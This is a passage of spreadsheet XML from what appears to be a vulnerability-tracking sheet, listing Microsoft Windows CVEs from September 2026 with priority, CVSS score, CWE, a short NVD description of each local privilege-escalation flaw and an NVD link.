      <c r="M939" s="5" t="inlineStr"/>
      <c r="N939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O939" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P939" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q939" s="5" t="inlineStr"/>
      <c r="R939" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S939" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69498</t>
        </is>
      </c>
      <c r="D940" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F940" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I940" s="5" t="inlineStr"/>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr"/>
      <c r="L940" s="5" t="inlineStr"/>
      <c r="M940" s="5" t="inlineStr"/>
      <c r="N940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O940" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P940" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q940" s="5" t="inlineStr"/>
      <c r="R940" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S940" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69500</t>
        </is>
      </c>
      <c r="D941" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F941" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I941" s="5" t="inlineStr"/>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr"/>
      <c r="L941" s="5" t="inlineStr"/>
      <c r="M941" s="5" t="inlineStr"/>
      <c r="N941" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O941" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P941" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q941" s="5" t="inlineStr"/>
      <c r="R941" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S941" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="D942" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F942" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I942" s="5" t="inlineStr"/>
      <c r="J942" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K942" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L942" s="5" t="inlineStr"/>
      <c r="M942" s="5" t="inlineStr"/>
      <c r="N942" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O942" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P942" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q942" s="5" t="inlineStr"/>
      <c r="R942" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S942" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69516</t>
        </is>
      </c>
      <c r="D943" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F943" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G943" s="5" t="inlineStr"/>
      <c r="H943" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I943" s="5" t="inlineStr"/>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr"/>
      <c r="L943" s="5" t="inlineStr"/>
      <c r="M943" s="5" t="inlineStr"/>
      <c r="N943" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O943" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P943" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q943" s="5" t="inlineStr"/>
      <c r="R943" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S943" s="5" t="inlineStr">
        <is>
          <t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69517</t>
        </is>
      </c>
      <c r="D944" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F944" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I944" s="5" t="inlineStr"/>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr"/>
      <c r="L944" s="5" t="inlineStr"/>
      <c r="M944" s="5" t="inlineStr"/>
      <c r="N944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O944" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P944" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q944" s="5" t="inlineStr"/>
      <c r="R944" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S944" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69540</t>
        </is>
      </c>
      <c r="D945" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F945" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I945" s="5" t="inlineStr"/>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr"/>
      <c r="L945" s="5" t="inlineStr"/>
      <c r="M945" s="5" t="inlineStr"/>
      <c r="N945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O945" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P945" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q945" s="5" t="inlineStr"/>
      <c r="R945" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S945" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69549</t>
        </is>
      </c>
      <c r="D946" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F946" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I946" s="5" t="inlineStr"/>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr"/>
      <c r="L946" s="5" t="inlineStr"/>
      <c r="M946" s="5" t="inlineStr"/>
      <c r="N946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P946" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q946" s="5" t="inlineStr"/>
      <c r="R946" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="S946" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69560</t>
        </is>
      </c>
      <c r="D947" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F947" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G947" s="5" t="inlineStr"/>
      <c r="H947" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I947" s="5" t="inlineStr"/>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr"/>
      <c r="L947" s="5" t="inlineStr"/>
      <c r="M947" s="5" t="inlineStr"/>
      <c r="N947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P947" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q947" s="5" t="inlineStr"/>
      <c r="R947" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S947" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69563</t>
        </is>
      </c>
      <c r="D948" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E948" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F948" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G948" s="5" t="inlineStr"/>
      <c r="H948" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I948" s="5" t="inlineStr"/>
      <c r="J948" s="5" t="inlineStr"/>
      <c r="K948" s="5" t="inlineStr"/>
      <c r="L948" s="5" t="inlineStr"/>
      <c r="M948" s="5" t="inlineStr"/>
      <c r="N948" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O948" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P948" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q948" s="5" t="inlineStr"/>
      <c r="R948" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-367</t>
        </is>
      </c>
      <c r="S948" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T948" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69563</t>
        </is>
      </c>
    </row>
    <row r="949">
      <c r="A949" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B949" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C949" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69564</t>
        </is>
      </c>
      <c r="D949" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E949" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F949" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G949" s="5" t="inlineStr"/>
      <c r="H949" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I949" s="5" t="inlineStr"/>
      <c r="J949" s="5" t="inlineStr"/>
      <c r="K949" s="5" t="inlineStr"/>
      <c r="L949" s="5" t="inlineStr"/>
      <c r="M949" s="5" t="inlineStr"/>
      <c r="N949" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O949" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P949" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q949" s="5" t="inlineStr"/>
      <c r="R949" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S949" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Online Certificate Status Protocol (OCSP) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T949" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69564</t>
        </is>
      </c>
    </row>
    <row r="950">
      <c r="A950" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B950" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C950" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69567</t>
        </is>
      </c>
      <c r="D950" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E950" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F950" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G950" s="5" t="inlineStr"/>
      <c r="H950" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I950" s="5" t="inlineStr"/>
      <c r="J950" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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50" s="5" t="inlineStr"/>
      <c r="M950" s="5" t="inlineStr"/>
      <c r="N950" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O950" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P950" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q950" s="5" t="inlineStr"/>
      <c r="R950" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S950" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T950" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69567</t>
        </is>
      </c>
    </row>
    <row r="951">
      <c r="A951" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B951" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C951" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69573</t>
        </is>
      </c>
      <c r="D951" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E951" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F951" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G951" s="5" t="inlineStr"/>
      <c r="H951" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I951" s="5" t="inlineStr"/>
      <c r="J951" s="5" t="inlineStr"/>
      <c r="K951" s="5" t="inlineStr"/>
      <c r="L951" s="5" t="inlineStr"/>
      <c r="M951" s="5" t="inlineStr"/>
      <c r="N951" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O951" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P951" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q951" s="5" t="inlineStr"/>
      <c r="R951" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S951" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T951" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69573</t>
        </is>
      </c>
    </row>
    <row r="952">
      <c r="A952" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B952" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C952" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69574</t>
        </is>
      </c>
      <c r="D952" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E952" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F952" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G952" s="5" t="inlineStr"/>
      <c r="H952" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I952" s="5" t="inlineStr"/>
      <c r="J952" s="5" t="inlineStr"/>
      <c r="K952" s="5" t="inlineStr"/>
      <c r="L952" s="5" t="inlineStr"/>
      <c r="M952" s="5" t="inlineStr"/>
      <c r="N952" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P952" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q952" s="5" t="inlineStr"/>
      <c r="R952" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S952" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T952" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69574</t>
        </is>
      </c>
    </row>
    <row r="953">
      <c r="A953" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B953" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C953" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69575</t>
        </is>
      </c>
      <c r="D953" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E953" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F953" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G953" s="5" t="inlineStr"/>
      <c r="H953" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I953" s="5" t="inlineStr"/>
      <c r="J953" s="5" t="inlineStr"/>
      <c r="K953" s="5" t="inlineStr"/>
      <c r="L953" s="5" t="inlineStr"/>
      <c r="M953" s="5" t="inlineStr"/>
      <c r="N953" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O953" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P953" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q953" s="5" t="inlineStr"/>
      <c r="R953" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S953" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Storage Spaces Controller allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T953" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69575</t>
        </is>
      </c>
    </row>
    <row r="954">
      <c r="A954" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B954" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C954" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69578</t>
        </is>
      </c>
      <c r="D954" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E954" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F954" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G954" s="5" t="inlineStr"/>
      <c r="H954" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I954" s="5" t="inlineStr"/>
      <c r="J954" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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54" s="5" t="inlineStr"/>
      <c r="M954" s="5" t="inlineStr"/>
      <c r="N954" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O954" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P954" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q954" s="5" t="inlineStr"/>
      <c r="R954" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="S954" s="5" t="inlineStr">
        <is>
          <t>Numeric truncation error in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T954" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69578</t>
        </is>
      </c>
    </row>
    <row r="955">
      <c r="A955" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B955" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C955" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69581</t>
        </is>
      </c>
      <c r="D955" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E955" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F955" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G955" s="5" t="inlineStr"/>
      <c r="H955" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I955" s="5" t="inlineStr"/>
      <c r="J955" s="5" t="inlineStr"/>
      <c r="K955" s="5" t="inlineStr"/>
      <c r="L955" s="5" t="inlineStr"/>
      <c r="M955" s="5" t="inlineStr"/>
      <c r="N955" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O955" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P955" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q955" s="5" t="inlineStr"/>
      <c r="R955" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S955" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T955" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69581</t>
        </is>
      </c>
    </row>
    <row r="956">
      <c r="A956" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B956" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C956" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69600</t>
        </is>
      </c>
      <c r="D956" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E956" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F956" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G956" s="5" t="inlineStr"/>
      <c r="H956" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I956" s="5" t="inlineStr"/>
      <c r="J956" s="5" t="inlineStr"/>
      <c r="K956" s="5" t="inlineStr"/>
      <c r="L956" s="5" t="inlineStr"/>
      <c r="M956" s="5" t="inlineStr"/>
      <c r="N956" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O956" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P956" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q956" s="5" t="inlineStr"/>
      <c r="R956" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S956" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T956" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69600</t>
        </is>
      </c>
    </row>
    <row r="957">
      <c r="A957" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B957" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
